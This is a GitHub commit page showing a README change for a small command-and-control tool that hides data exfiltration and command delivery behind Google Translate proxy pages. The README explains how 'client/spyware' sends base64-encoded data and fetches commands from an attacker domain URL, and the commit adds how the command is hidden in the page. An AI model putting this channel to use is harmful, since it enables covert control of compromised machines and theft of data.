Skip to content

Commit

Permalink
Hide cmd
Browse files Browse the repository at this point in the history
  • Loading branch information
Gakamine committed Jan 30, 2023
1 parent 81df4b9 commit b2c9e1c
Showing 1 changed file with 2 additions and 1 deletion.
3 changes: 2 additions & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -21,8 +21,9 @@ A simple C2 meant to be used behind Google Translate Webpages as a proxy for dat
- ``data`` is the content you want to exfiltrate. If it's a file, it can be encoded in base64 and decoded automatically on the admin dashboard. If it's a base64 data, you must split it into multiple strings otherwise Google Translate will limit you.
You can expand the size of the data by editing ``collector\models.py`` and edit the ``max_length=<your value>`` for the ``data_content`` field.

### Sending command
### Getting command
- Fetch the following link from your client/spyware: ``https://your-domain.translate.goog/c/<hostname>/<ip>/<random_string>``
- The random string is used to prevent Google to cache the URL.
- The command is hidden in a class. You can find it by searching for the picture with ``alt="screen3"``

# FOR EDUCATIONAL PURPOSE ONLY

0 comments on commit b2c9e1c

Please sign in to comment.